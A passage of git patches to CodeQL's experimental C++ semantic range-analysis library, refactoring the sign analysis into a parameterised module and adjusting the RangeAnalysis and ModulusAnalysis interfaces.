RangeUtils private import Sign -/** - * An SSA definition for which the analysis can compute the sign. - * - * The actual computation of the sign is done in an override of the `getSign()` predicate. The - * charpred of any subclass must _not_ invoke `getSign()`, directly or indirectly. This ensures - * that the charpred does not introduce negative recursion. The `getSign()` predicate may be - * recursive. - */ -abstract private class SignDef instanceof SemSsaVariable { - final string toString() { result = super.toString() } +module SignAnalysis Utils> { + /** + * An SSA definition for which the analysis can compute the sign. + * + * The actual computation of the sign is done in an override of the `getSign()` predicate. The + * charpred of any subclass must _not_ invoke `getSign()`, directly or indirectly. This ensures + * that the charpred does not introduce negative recursion. The `getSign()` predicate may be + * recursive. + */ + abstract private class SignDef instanceof SemSsaVariable { + final string toString() { result = super.toString() } - /** Gets the possible signs of this SSA definition. */ - abstract Sign getSign(); -} - -/** An SSA definition whose sign is computed based on standard flow. */ -abstract private class FlowSignDef extends SignDef { - abstract override Sign getSign(); -} - -/** An SSA definition whose sign is determined by the sign of that definitions source expression. */ -private class ExplicitSignDef extends FlowSignDef instanceof SemSsaExplicitUpdate { - final override Sign getSign() { result = semExprSign(super.getSourceExpr()) } -} - -/** An SSA Phi definition, whose sign is the union of the signs of its inputs. */ -private class PhiSignDef extends FlowSignDef instanceof SemSsaPhiNode { - final override Sign getSign() { - exists(SemSsaVariable inp, SemSsaReadPositionPhiInputEdge edge | - edge.phiInput(this, inp) and - result = semSsaSign(inp, edge) - ) - } -} - -/** An SSA definition whose sign is computed by a language-specific implementation. */ -abstract class CustomSignDef extends SignDef { - abstract override Sign getSign(); -} - -/** - * An expression for which the analysis can compute the sign. - * - * The actual computation of the sign is done in an override of the `getSign()` predicate. The - * charpred of any subclass must _not_ invoke `getSign()`, directly or indirectly. This ensures - * that the charpred does not introduce negative recursion. The `getSign()` predicate may be - * recursive. - * - * Concrete implementations extend one of the following subclasses: - * - `ConstantSignExpr`, for expressions with a compile-time constant value. - * - `FlowSignExpr`, for expressions whose sign can be computed from the signs of their operands. - * - `CustomsignExpr`, for expressions whose sign can be computed by a language-specific - * implementation. - * - * If the same expression matches more than one of the above subclasses, the sign is computed as - * follows: - * - The sign of a `ConstantSignExpr` is computed solely from `ConstantSignExpr.getSign()`, - * regardless of any other subclasses. - * - If a non-`ConstantSignExpr` expression matches exactly one of `FlowSignExpr` or - * `CustomSignExpr`, the sign is computed by that class' `getSign()` predicate. - * - If a non-`ConstantSignExpr` expression matches both `FlowSignExpr` and `CustomSignExpr`, the - * sign is the _intersection_ of the signs of those two classes' `getSign()` predicates. Thus, - * both classes have the opportunity to _restrict_ the set of possible signs, not to generate new - * possible signs. - * - If an expression does not match any of the three subclasses, then it can have any sign. - * - * Note that the `getSign()` predicate is introduced only in subclasses of `SignExpr`. - */ -abstract class SignExpr instanceof SemExpr { - SignExpr() { not Specific::ignoreExprSign(this) } - - final string toString() { result = super.toString() } - - abstract Sign getSign(); -} - -/** An expression whose sign is determined by its constant numeric value. */ -private class ConstantSignExpr extends SignExpr { - ConstantSignExpr() { - this instanceof SemConstantIntegerExpr or - exists(this.(SemNumericLiteralExpr).getApproximateFloatValue()) + /** Gets the possible signs of this SSA definition. */ + abstract Sign getSign(); } - final override Sign getSign() { - exists(int i | this.(SemConstantIntegerExpr).getIntValue() = i | - i < 0 and result = TNeg() + /** An SSA definition whose sign is computed based on standard flow. */ + abstract private class FlowSignDef extends SignDef { + abstract override Sign getSign(); + } + + /** An SSA definition whose sign is determined by the sign of that definitions source expression. */ + private class ExplicitSignDef extends FlowSignDef instanceof SemSsaExplicitUpdate { + final override Sign getSign() { result = semExprSign(super.getSourceExpr()) } + } + + /** An SSA Phi definition, whose sign is the union of the signs of its inputs. */ + private class PhiSignDef extends FlowSignDef instanceof SemSsaPhiNode { + final override Sign getSign() { + exists(SemSsaVariable inp, SemSsaReadPositionPhiInputEdge edge | + edge.phiInput(this, inp) and + result = semSsaSign(inp, edge) + ) + } + } + + /** An SSA definition whose sign is computed by a language-specific implementation. */ + abstract class CustomSignDef extends SignDef { + abstract override Sign getSign(); + } + + /** + * An expression for which the analysis can compute the sign. + * + * The actual computation of the sign is done in an override of the `getSign()` predicate. The + * charpred of any subclass must _not_ invoke `getSign()`, directly or indirectly. This ensures + * that the charpred does not introduce negative recursion. The `getSign()` predicate may be + * recursive. + * + * Concrete implementations extend one of the following subclasses: + * - `ConstantSignExpr`, for expressions with a compile-time constant value. + * - `FlowSignExpr`, for expressions whose sign can be computed from the signs of their operands. + * - `CustomsignExpr`, for expressions whose sign can be computed by a language-specific + * implementation. + * + * If the same expression matches more than one of the above subclasses, the sign is computed as + * follows: + * - The sign of a `ConstantSignExpr` is computed solely from `ConstantSignExpr.getSign()`, + * regardless of any other subclasses. + * - If a non-`ConstantSignExpr` expression matches exactly one of `FlowSignExpr` or + * `CustomSignExpr`, the sign is computed by that class' `getSign()` predicate. + * - If a non-`ConstantSignExpr` expression matches both `FlowSignExpr` and `CustomSignExpr`, the + * sign is the _intersection_ of the signs of those two classes' `getSign()` predicates. Thus, + * both classes have the opportunity to _restrict_ the set of possible signs, not to generate new + * possible signs. + * - If an expression does not match any of the three subclasses, then it can have any sign. + * + * Note that the `getSign()` predicate is introduced only in subclasses of `SignExpr`. + */ + abstract class SignExpr instanceof SemExpr { + SignExpr() { not Specific::ignoreExprSign(this) } + + final string toString() { result = super.toString() } + + abstract Sign getSign(); + } + + /** An expression whose sign is determined by its constant numeric value. */ + private class ConstantSignExpr extends SignExpr { + ConstantSignExpr() { + this instanceof SemConstantIntegerExpr or + exists(this.(SemNumericLiteralExpr).getApproximateFloatValue()) + } + + final override Sign getSign() { + exists(int i | this.(SemConstantIntegerExpr).getIntValue() = i | + i < 0 and result = TNeg() + or + i = 0 and result = TZero() + or + i > 0 and result = TPos() + ) or - i = 0 and result = TZero() - or - i > 0 and result = TPos() - ) - or - not exists(this.(SemConstantIntegerExpr).getIntValue()) and - exists(float f | f = this.(SemNumericLiteralExpr).getApproximateFloatValue() | - f < 0 and result = TNeg() - or - f = 0 and result = TZero() - or - f > 0 and result = TPos() - ) - } -} - -abstract private class NonConstantSignExpr extends SignExpr { - NonConstantSignExpr() { not this instanceof ConstantSignExpr } - - final override Sign getSign() { - // The result is the _intersection_ of the signs computed from flow and by the language. - (result = this.(FlowSignExpr).getSignRestriction() or not this instanceof FlowSignExpr) and - (result = this.(CustomSignExpr).getSignRestriction() or not this instanceof CustomSignExpr) - } -} - -/** An expression whose sign is computed from the signs of its operands. */ -abstract private class FlowSignExpr extends NonConstantSignExpr { - abstract Sign getSignRestriction(); -} - -/** An expression whose sign is computed by a language-specific implementation. */ -abstract class CustomSignExpr extends NonConstantSignExpr { - abstract Sign getSignRestriction(); -} - -/** An expression whose sign is unknown. */ -private class UnknownSignExpr extends SignExpr { - UnknownSignExpr() { - not this instanceof FlowSignExpr and - not this instanceof CustomSignExpr and - not this instanceof ConstantSignExpr and - ( - // Only track numeric types. - getTrackedType(this) instanceof SemNumericType - or - // Unless the language says to track this expression anyway. - Specific::trackUnknownNonNumericExpr(this) - ) + not exists(this.(SemConstantIntegerExpr).getIntValue()) and + exists(float f | f = this.(SemNumericLiteralExpr).getApproximateFloatValue() | + f < 0 and result = TNeg() + or + f = 0 and result = TZero() + or + f > 0 and result = TPos() + ) + } } - final override Sign getSign() { semAnySign(result) } -} + abstract private class NonConstantSignExpr extends SignExpr { + NonConstantSignExpr() { not this instanceof ConstantSignExpr } -/** - * A `Load` expression whose sign is computed from the sign of its SSA definition, restricted by - * inference from any intervening guards. - */ -class UseSignExpr extends FlowSignExpr { - SemSsaVariable v; - - UseSignExpr() { v.getAUse() = this } - - override Sign getSignRestriction() { - // Propagate via SSA - // Propagate the sign from the def of `v`, incorporating any inference from guards. - result = semSsaSign(v, any(SemSsaReadPositionBlock bb | bb.getAnExpr() = this)) - or - // No block for this read. Just use the sign of the def. - // REVIEW: How can this happen? - not exists(SemSsaReadPositionBlock bb | bb.getAnExpr() = this) and - result = semSsaDefSign(v) + final override Sign getSign() { + // The result is the _intersection_ of the signs computed from flow and by the language. + (result = this.(FlowSignExpr).getSignRestriction() or not this instanceof FlowSignExpr) and + (result = this.(CustomSignExpr).getSignRestriction() or not this instanceof CustomSignExpr) + } } -} -/** A binary expression whose sign is computed from the signs of its operands. */ -private class BinarySignExpr extends FlowSignExpr { - SemBinaryExpr binary; + /** An expression whose sign is computed from the signs of its operands. */ + abstract private class FlowSignExpr extends NonConstantSignExpr { + abstract Sign getSignRestriction(); + } - BinarySignExpr() { binary = this } + /** An expression whose sign is computed by a language-specific implementation. */ + abstract class CustomSignExpr extends NonConstantSignExpr { + abstract Sign getSignRestriction(); + } - override Sign getSignRestriction() { - exists(SemExpr left, SemExpr right | - binaryExprOperands(binary, left, right) and + /** An expression whose sign is unknown. */ + private class UnknownSignExpr extends SignExpr { + UnknownSignExpr() { + not this instanceof FlowSignExpr and + not this instanceof CustomSignExpr and + not this instanceof ConstantSignExpr and + ( + // Only track numeric types. + Utils::getTrackedType(this) instanceof SemNumericType + or + // Unless the language says to track this expression anyway. + Specific::trackUnknownNonNumericExpr(this) + ) + } + + final override Sign getSign() { semAnySign(result) } + } + + /** + * A `Load` expression whose sign is computed from the sign of its SSA definition, restricted by + * inference from any intervening guards. + */ + class UseSignExpr extends FlowSignExpr { + SemSsaVariable v; + + UseSignExpr() { v.getAUse() = this } + + override Sign getSignRestriction() { + // Propagate via SSA + // Propagate the sign from the def of `v`, incorporating any inference from guards. + result = semSsaSign(v, any(SemSsaReadPositionBlock bb | bb.getAnExpr() = this)) + or + // No block for this read. Just use the sign of the def. + // REVIEW: How can this happen? + not exists(SemSsaReadPositionBlock bb | bb.getAnExpr() = this) and + result = semSsaDefSign(v) + } + } + + /** A binary expression whose sign is computed from the signs of its operands. */ + private class BinarySignExpr extends FlowSignExpr { + SemBinaryExpr binary; + + BinarySignExpr() { binary = this } + + override Sign getSignRestriction() { + exists(SemExpr left, SemExpr right | + binaryExprOperands(binary, left, right) and + result = + semExprSign(pragma[only_bind_out](left)) + .applyBinaryOp(semExprSign(pragma[only_bind_out](right)), binary.getOpcode()) + ) + or + exists(SemDivExpr div | div = binary | + result = semExprSign(div.getLeftOperand()) and + result != TZero() and + div.getRightOperand().(SemFloatingPointLiteralExpr).getFloatValue() = 0 + ) + } + } + + pragma[nomagic] + private predicate binaryExprOperands(SemBinaryExpr binary, SemExpr left, SemExpr right) { + binary.getLeftOperand() = left and binary.getRightOperand() = right + } + + /** + * A `Convert`, `Box`, or `Unbox` expression. + */ + private class SemCastExpr instanceof SemUnaryExpr { + string toString() { result = super.toString() } + + SemCastExpr() { + this instanceof SemConvertExpr + or + this instanceof SemBoxExpr + or + this instanceof SemUnboxExpr + } + } + + /** A unary expression whose sign is computed from the sign of its operand. */ + private class UnarySignExpr extends FlowSignExpr { + SemUnaryExpr unary; + + UnarySignExpr() { unary = this and not this instanceof SemCastExpr } + + override Sign getSignRestriction() { result = - semExprSign(pragma[only_bind_out](left)) - .applyBinaryOp(semExprSign(pragma[only_bind_out](right)), binary.getOpcode()) - ) - or - exists(SemDivExpr div | div = binary | - result = semExprSign(div.getLeftOperand()) and - result != TZero() and - div.getRightOperand().(SemFloatingPointLiteralExpr).getFloatValue() = 0 + semExprSign(pragma[only_bind_out](unary.getOperand())).applyUnaryOp(unary.getOpcode()) + } + } + + /** + * A `Convert`, `Box`, or `Unbox` expression, whose sign is computed based on + * the sign of its operand and the source and destination types. + */ + abstract private class CastSignExpr extends FlowSignExpr { + SemUnaryExpr cast; + + CastSignExpr() { cast = this and cast instanceof SemCastExpr } + + override Sign getSignRestriction() { result = semExprSign(cast.getOperand()) } + } + + /** + * A `Convert` expression. + */ + private class ConvertSignExpr extends CastSignExpr { + override SemConvertExpr cast; + } + + /** + * A `Box` expression. + */ + private class BoxSignExpr extends CastSignExpr { + override SemBoxExpr cast; + } + + /** + * An `Unbox` expression. + */ + private class UnboxSignExpr extends CastSignExpr { + override SemUnboxExpr cast; + + UnboxSignExpr() { + exists(SemType fromType | fromType = Utils::getTrackedType(cast.getOperand()) | + // Only numeric source types are handled here. + fromType instanceof SemNumericType + ) + } + } + + private predicate unknownSign(SemExpr e) { e instanceof UnknownSignExpr } + + /** + * Holds if `lowerbound` is a lower bound for `v` at `pos`. This is restricted + * to only include bounds for which we might determine a sign. + */ + private predicate lowerBound( + SemExpr lowerbound, SemSsaVariable v, SemSsaReadPosition pos, boolean isStrict + ) { + exists(boolean testIsTrue, SemRelationalExpr comp | + pos.hasReadOfVar(v) and + semGuardControlsSsaRead(semGetComparisonGuard(comp), pos, testIsTrue) and + not unknownSign(lowerbound) + | + testIsTrue = true and + comp.getLesserOperand() = lowerbound and + comp.getGreaterOperand() = Utils::semSsaRead(v, D::fromInt(0)) and + (if comp.isStrict() then isStrict = true else isStrict = false) + or + testIsTrue = false and + comp.getGreaterOperand() = lowerbound and + comp.getLesserOperand() = Utils::semSsaRead(v, D::fromInt(0)) and + (if comp.isStrict() then isStrict = false else isStrict = true) ) } -} -pragma[nomagic] -private predicate binaryExprOperands(SemBinaryExpr binary, SemExpr left, SemExpr right) { - binary.getLeftOperand() = left and binary.getRightOperand() = right -} - -/** - * A `Convert`, `Box`, or `Unbox` expression. - */ -private class SemCastExpr extends SemUnaryExpr { - SemCastExpr() { - this instanceof SemConvertExpr - or - this instanceof SemBoxExpr - or - this instanceof SemUnboxExpr - } -} - -/** A unary expression whose sign is computed from the sign of its operand. */ -private class UnarySignExpr extends FlowSignExpr { - SemUnaryExpr unary; - - UnarySignExpr() { unary = this and not this instanceof SemCastExpr } - - override Sign getSignRestriction() { - result = semExprSign(pragma[only_bind_out](unary.getOperand())).applyUnaryOp(unary.getOpcode()) - } -} - -/** - * A `Convert`, `Box`, or `Unbox` expression, whose sign is computed based on - * the sign of its operand and the source and destination types. - */ -abstract private class CastSignExpr extends FlowSignExpr { - SemUnaryExpr cast; - - CastSignExpr() { cast = this and cast instanceof SemCastExpr } - - override Sign getSignRestriction() { result = semExprSign(cast.getOperand()) } -} - -/** - * A `Convert` expression. - */ -private class ConvertSignExpr extends CastSignExpr { - override SemConvertExpr cast; -} - -/** - * A `Box` expression. - */ -private class BoxSignExpr extends CastSignExpr { - override SemBoxExpr cast; -} - -/** - * An `Unbox` expression. - */ -private class UnboxSignExpr extends CastSignExpr { - override SemUnboxExpr cast; - - UnboxSignExpr() { - exists(SemType fromType | fromType = getTrackedType(cast.getOperand()) | - // Only numeric source types are handled here. - fromType instanceof SemNumericType + /** + * Holds if `upperbound` is an upper bound for `v` at `pos`. This is restricted + * to only include bounds for which we might determine a sign. + */ + private predicate upperBound( + SemExpr upperbound, SemSsaVariable v, SemSsaReadPosition pos, boolean isStrict + ) { + exists(boolean testIsTrue, SemRelationalExpr comp | + pos.hasReadOfVar(v) and + semGuardControlsSsaRead(semGetComparisonGuard(comp), pos, testIsTrue) and + not unknownSign(upperbound) + | + testIsTrue = true and + comp.getGreaterOperand() = upperbound and + comp.getLesserOperand() = Utils::semSsaRead(v, D::fromInt(0)) and + (if comp.isStrict() then isStrict = true else isStrict = false) + or + testIsTrue = false and + comp.getLesserOperand() = upperbound and + comp.getGreaterOperand() = Utils::semSsaRead(v, D::fromInt(0)) and + (if comp.isStrict() then isStrict = false else isStrict = true) ) } -} -private predicate unknownSign(SemExpr e) { e instanceof UnknownSignExpr } + /** + * Holds if `eqbound` is an equality/inequality for `v` at `pos`. This is + * restricted to only include bounds for which we might determine a sign. The + * boolean `isEq` gives the polarity: + * - `isEq = true` : `v = eqbound` + * - `isEq = false` : `v != eqbound` + */ + private predicate eqBound(SemExpr eqbound, SemSsaVariable v, SemSsaReadPosition pos, boolean isEq) { + exists(SemGuard guard, boolean testIsTrue, boolean polarity | + pos.hasReadOfVar(v) and + semGuardControlsSsaRead(guard, pos, testIsTrue) and + guard.isEquality(eqbound, Utils::semSsaRead(v, D::fromInt(0)), polarity) and + isEq = polarity.booleanXor(testIsTrue).booleanNot() and + not unknownSign(eqbound) + ) + } -/** - * Holds if `lowerbound` is a lower bound for `v` at `pos`. This is restricted - * to only include bounds for which we might determine a sign. - */ -private predicate lowerBound( - SemExpr lowerbound, SemSsaVariable v, SemSsaReadPosition pos, boolean isStrict -) { - exists(boolean testIsTrue, SemRelationalExpr comp | - pos.hasReadOfVar(v) and - semGuardControlsSsaRead(semGetComparisonGuard(comp), pos, testIsTrue) and - not unknownSign(lowerbound) - | - testIsTrue = true and - comp.getLesserOperand() = lowerbound and - comp.getGreaterOperand() = semSsaRead(v, 0) and - (if comp.isStrict() then isStrict = true else isStrict = false) + /** + * Holds if `bound` is a bound for `v` at `pos` that needs to be positive in + * order for `v` to be positive. + */ + private predicate posBound(SemExpr bound, SemSsaVariable v, SemSsaReadPosition pos) { + upperBound(bound, v, pos, _) or + eqBound(bound, v, pos, true) + } + + /** + * Holds if `bound` is a bound for `v` at `pos` that needs to be negative in + * order for `v` to be negative. + */ + private predicate negBound(SemExpr bound, SemSsaVariable v, SemSsaReadPosition pos) { + lowerBound(bound, v, pos, _) or + eqBound(bound, v, pos, true) + } + + /** + * Holds if `bound` is a bound for `v` at `pos` that can restrict whether `v` + * can be zero. + */ + private predicate zeroBound(SemExpr bound, SemSsaVariable v, SemSsaReadPosition pos) { + lowerBound(bound, v, pos, _) or + upperBound(bound, v, pos, _) or + eqBound(bound, v, pos, _) + } + + /** Holds if `bound` allows `v` to be positive at `pos`. */ + private predicate posBoundOk(SemExpr bound, SemSsaVariable v, SemSsaReadPosition pos) { + posBound(bound, v, pos) and TPos() = semExprSign(bound) + } + + /** Holds if `bound` allows `v` to be negative at `pos`. */ + private predicate negBoundOk(SemExpr bound, SemSsaVariable v, SemSsaReadPosition pos) { + negBound(bound, v, pos) and TNeg() = semExprSign(bound) + } + + /** Holds if `bound` allows `v` to be zero at `pos`. */ + private predicate zeroBoundOk(SemExpr bound, SemSsaVariable v, SemSsaReadPosition pos) { + lowerBound(bound, v, pos, _) and TNeg() = semExprSign(bound) or - testIsTrue = false and - comp.getGreaterOperand() = lowerbound and - comp.getLesserOperand() = semSsaRead(v, 0) and - (if comp.isStrict() then isStrict = false else isStrict = true) - ) -} - -/** - * Holds if `upperbound` is an upper bound for `v` at `pos`. This is restricted - * to only include bounds for which we might determine a sign. - */ -private predicate upperBound( - SemExpr upperbound, SemSsaVariable v, SemSsaReadPosition pos, boolean isStrict -) { - exists(boolean testIsTrue, SemRelationalExpr comp | - pos.hasReadOfVar(v) and - semGuardControlsSsaRead(semGetComparisonGuard(comp), pos, testIsTrue) and - not unknownSign(upperbound) - | - testIsTrue = true and - comp.getGreaterOperand() = upperbound and - comp.getLesserOperand() = semSsaRead(v, 0) and - (if comp.isStrict() then isStrict = true else isStrict = false) + lowerBound(bound, v, pos, false) and TZero() = semExprSign(bound) or - testIsTrue = false and - comp.getLesserOperand() = upperbound and - comp.getGreaterOperand() = semSsaRead(v, 0) and - (if comp.isStrict() then isStrict = false else isStrict = true) - ) -} + upperBound(bound, v, pos, _) and TPos() = semExprSign(bound) + or + upperBound(bound, v, pos, false) and TZero() = semExprSign(bound) + or + eqBound(bound, v, pos, true) and TZero() = semExprSign(bound) + or + eqBound(bound, v, pos, false) and TZero() != semExprSign(bound) + } -/** - * Holds if `eqbound` is an equality/inequality for `v` at `pos`. This is - * restricted to only include bounds for which we might determine a sign. The - * boolean `isEq` gives the polarity: - * - `isEq = true` : `v = eqbound` - * - `isEq = false` : `v != eqbound` - */ -private predicate eqBound(SemExpr eqbound, SemSsaVariable v, SemSsaReadPosition pos, boolean isEq) { - exists(SemGuard guard, boolean testIsTrue, boolean polarity | + /** + * Holds if there is a bound that might restrict whether `v` has the sign `s` + * at `pos`. + */ + private predicate hasGuard(SemSsaVariable v, SemSsaReadPosition pos, Sign s) { + s = TPos() and posBound(_, v, pos) + or + s = TNeg() and negBound(_, v, pos) + or + s = TZero() and zeroBound(_, v, pos) + } + + /** + * Gets a possible sign of `v` at `pos` based on its definition, where the sign + * might be ruled out by a guard. + */ + pragma[noinline] + private Sign guardedSsaSign(SemSsaVariable v, SemSsaReadPosition pos) { + result = semSsaDefSign(v) and pos.hasReadOfVar(v) and - semGuardControlsSsaRead(guard, pos, testIsTrue) and - guard.isEquality(eqbound, semSsaRead(v, 0), polarity) and - isEq = polarity.booleanXor(testIsTrue).booleanNot() and - not unknownSign(eqbound) - ) -} - -/** - * Holds if `bound` is a bound for `v` at `pos` that needs to be positive in - * order for `v` to be positive. - */ -private predicate posBound(SemExpr bound, SemSsaVariable v, SemSsaReadPosition pos) { - upperBound(bound, v, pos, _) or - eqBound(bound, v, pos, true) -} - -/** - * Holds if `bound` is a bound for `v` at `pos` that needs to be negative in - * order for `v` to be negative. - */ -private predicate negBound(SemExpr bound, SemSsaVariable v, SemSsaReadPosition pos) { - lowerBound(bound, v, pos, _) or - eqBound(bound, v, pos, true) -} - -/** - * Holds if `bound` is a bound for `v` at `pos` that can restrict whether `v` - * can be zero. - */ -private predicate zeroBound(SemExpr bound, SemSsaVariable v, SemSsaReadPosition pos) { - lowerBound(bound, v, pos, _) or - upperBound(bound, v, pos, _) or - eqBound(bound, v, pos, _) -} - -/** Holds if `bound` allows `v` to be positive at `pos`. */ -private predicate posBoundOk(SemExpr bound, SemSsaVariable v, SemSsaReadPosition pos) { - posBound(bound, v, pos) and TPos() = semExprSign(bound) -} - -/** Holds if `bound` allows `v` to be negative at `pos`. */ -private predicate negBoundOk(SemExpr bound, SemSsaVariable v, SemSsaReadPosition pos) { - negBound(bound, v, pos) and TNeg() = semExprSign(bound) -} - -/** Holds if `bound` allows `v` to be zero at `pos`. */ -private predicate zeroBoundOk(SemExpr bound, SemSsaVariable v, SemSsaReadPosition pos) { - lowerBound(bound, v, pos, _) and TNeg() = semExprSign(bound) - or - lowerBound(bound, v, pos, false) and TZero() = semExprSign(bound) - or - upperBound(bound, v, pos, _) and TPos() = semExprSign(bound) - or - upperBound(bound, v, pos, false) and TZero() = semExprSign(bound) - or - eqBound(bound, v, pos, true) and TZero() = semExprSign(bound) - or - eqBound(bound, v, pos, false) and TZero() != semExprSign(bound) -} - -/** - * Holds if there is a bound that might restrict whether `v` has the sign `s` - * at `pos`. - */ -private predicate hasGuard(SemSsaVariable v, SemSsaReadPosition pos, Sign s) { - s = TPos() and posBound(_, v, pos) - or - s = TNeg() and negBound(_, v, pos) - or - s = TZero() and zeroBound(_, v, pos) -} - -/** - * Gets a possible sign of `v` at `pos` based on its definition, where the sign - * might be ruled out by a guard. - */ -pragma[noinline] -private Sign guardedSsaSign(SemSsaVariable v, SemSsaReadPosition pos) { - result = semSsaDefSign(v) and - pos.hasReadOfVar(v) and - hasGuard(v, pos, result) -} - -/** - * Gets a possible sign of `v` at `pos` based on its definition, where no guard - * can rule it out. - */ -pragma[noinline] -private Sign unguardedSsaSign(SemSsaVariable v, SemSsaReadPosition pos) { - result = semSsaDefSign(v) and - pos.hasReadOfVar(v) and - not hasGuard(v, pos, result) -} - -/** - * Gets a possible sign of `v` at read position `pos`, where a guard could have - * ruled out the sign but does not. - * This does not check that the definition of `v` also allows the sign. - */ -private Sign guardedSsaSignOk(SemSsaVariable v, SemSsaReadPosition pos) { - result = TPos() and - forex(SemExpr bound | posBound(bound, v, pos) | posBoundOk(bound, v, pos)) - or - result = TNeg() and - forex(SemExpr bound | negBound(bound, v, pos) | negBoundOk(bound, v, pos)) - or - result = TZero() and - forex(SemExpr bound | zeroBound(bound, v, pos) | zeroBoundOk(bound, v, pos)) -} - -/** Gets a possible sign for `v` at `pos`. */ -private Sign semSsaSign(SemSsaVariable v, SemSsaReadPosition pos) { - result = unguardedSsaSign(v, pos) - or - result = guardedSsaSign(v, pos) and - result = guardedSsaSignOk(v, pos) -} - -/** Gets a possible sign for `v`. */ -pragma[nomagic] -Sign semSsaDefSign(SemSsaVariable v) { result = v.(SignDef).getSign() } - -/** Gets a possible sign for `e`. */ -cached -Sign semExprSign(SemExpr e) { - exists(Sign s | s = e.(SignExpr).getSign() | - if - getTrackedType(e) instanceof SemUnsignedIntegerType and - s = TNeg() and - not Specific::ignoreTypeRestrictions(e) - then result = TPos() - else result = s - ) -} - -/** - * Dummy predicate that holds for any sign. This is added to improve readability - * of cases where the sign is unrestricted. - */ -predicate semAnySign(Sign s) { any() } - -/** Holds if `e` can be positive and cannot be negative. */ -predicate semPositive(SemExpr e) { - semExprSign(e) = TPos() and - not semExprSign(e) = TNeg() -} - -/** Holds if `e` can be negative and cannot be positive. */ -predicate semNegative(SemExpr e) { - semExprSign(e) = TNeg() and - not semExprSign(e) = TPos() -} - -/** Holds if `e` is strictly positive. */ -predicate semStrictlyPositive(SemExpr e) { - semExprSign(e) = TPos() and - not semExprSign(e) = TNeg() and - not semExprSign(e) = TZero() -} - -/** Holds if `e` is strictly negative. */ -predicate semStrictlyNegative(SemExpr e) { - semExprSign(e) = TNeg() and - not semExprSign(e) = TPos() and - not semExprSign(e) = TZero() + hasGuard(v, pos, result) + } + + /** + * Gets a possible sign of `v` at `pos` based on its definition, where no guard + * can rule it out. + */ + pragma[noinline] + private Sign unguardedSsaSign(SemSsaVariable v, SemSsaReadPosition pos) { + result = semSsaDefSign(v) and + pos.hasReadOfVar(v) and + not hasGuard(v, pos, result) + } + + /** + * Gets a possible sign of `v` at read position `pos`, where a guard could have + * ruled out the sign but does not. + * This does not check that the definition of `v` also allows the sign. + */ + private Sign guardedSsaSignOk(SemSsaVariable v, SemSsaReadPosition pos) { + result = TPos() and + forex(SemExpr bound | posBound(bound, v, pos) | posBoundOk(bound, v, pos)) + or + result = TNeg() and + forex(SemExpr bound | negBound(bound, v, pos) | negBoundOk(bound, v, pos)) + or + result = TZero() and + forex(SemExpr bound | zeroBound(bound, v, pos) | zeroBoundOk(bound, v, pos)) + } + + /** Gets a possible sign for `v` at `pos`. */ + private Sign semSsaSign(SemSsaVariable v, SemSsaReadPosition pos) { + result = unguardedSsaSign(v, pos) + or + result = guardedSsaSign(v, pos) and + result = guardedSsaSignOk(v, pos) + } + + /** Gets a possible sign for `v`. */ + pragma[nomagic] + Sign semSsaDefSign(SemSsaVariable v) { result = v.(SignDef).getSign() } + + /** Gets a possible sign for `e`. */ + cached + Sign semExprSign(SemExpr e) { + exists(Sign s | s = e.(SignExpr).getSign() | + if + Utils::getTrackedType(e) instanceof SemUnsignedIntegerType and + s = TNeg() and + not Specific::ignoreTypeRestrictions(e) + then result = TPos() + else result = s + ) + } + + /** + * Dummy predicate that holds for any sign. This is added to improve readability + * of cases where the sign is unrestricted. + */ + predicate semAnySign(Sign s) { any() } + + /** Holds if `e` can be positive and cannot be negative. */ + predicate semPositive(SemExpr e) { + semExprSign(e) = TPos() and + not semExprSign(e) = TNeg() + } + + /** Holds if `e` can be negative and cannot be positive. */ + predicate semNegative(SemExpr e) { + semExprSign(e) = TNeg() and + not semExprSign(e) = TPos() + } + + /** Holds if `e` is strictly positive. */ + predicate semStrictlyPositive(SemExpr e) { + semExprSign(e) = TPos() and + not semExprSign(e) = TNeg() and + not semExprSign(e) = TZero() + } + + /** Holds if `e` is strictly negative. */ + predicate semStrictlyNegative(SemExpr e) { + semExprSign(e) = TNeg() and + not semExprSign(e) = TPos() and + not semExprSign(e) = TZero() + } } From 71b93d125e5310c948d2715a1f132f69673ac27a Mon Sep 17 00:00:00 2001 From: Robert Marsh Date: Fri, 16 Dec 2022 16:01:40 -0500 Subject: [PATCH 250/381] C++: Make RangeAnalysis.qll expose the old API --- .../semmle/code/cpp/semantic/analysis/RangeAnalysis.qll | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysis.qll b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysis.qll index 6d7ba2e9ff1..378bdd2dfc6 100644 --- a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysis.qll +++ b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/RangeAnalysis.qll @@ -3,4 +3,5 @@ private import RangeAnalysisSpecific private import FloatDelta private import RangeUtils -module CppRangeAnalysis = RangeStage>; \ No newline at end of file +private module CppRangeAnalysis = RangeStage>; +import CppRangeAnalysis \ No newline at end of file From 02f1957919c513d132787ed1050cab276983ae2a Mon Sep 17 00:00:00 2001 From: Robert Marsh Date: Mon, 19 Dec 2022 12:13:47 -0500 Subject: [PATCH 251/381] C++: make SemBound a RangeAnalysis parameter --- .../cpp/semantic/analysis/ModulusAnalysis.qll | 36 +++++++++---------- .../cpp/semantic/analysis/RangeAnalysis.qll | 21 +++++++++-- .../analysis/RangeAnalysisSpecific.qll | 2 +- .../semantic/analysis/RangeAnalysisStage.qll | 25 ++++++++++--- 4 files changed, 59 insertions(+), 25 deletions(-) diff --git a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/ModulusAnalysis.qll b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/ModulusAnalysis.qll index 852dd40aad0..562e60db408 100644 --- a/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/ModulusAnalysis.qll +++ b/cpp/ql/lib/experimental/semmle/code/cpp/semantic/analysis/ModulusAnalysis.qll @@ -16,7 +16,7 @@ private import ConstantAnalysis private import RangeUtils private import RangeAnalysisStage -module ModulusAnalysis U> { +module ModulusAnalysis Bounds, UtilSig U> { /** * Holds if `e + delta` equals `v` at `pos`. */ @@ -146,7 +146,7 @@ module ModulusAnalysis U> { private predicate phiSelfModulus( SemSsaPhiNode phi, SemSsaVariable inp, SemSsaReadPositionPhiInputEdge edge, int mod ) { - exists(SemSsaBound phibound, int v, int m | + exists(Bounds::SemSsaBound phibound, int v, int m | edge.phiInput(phi, 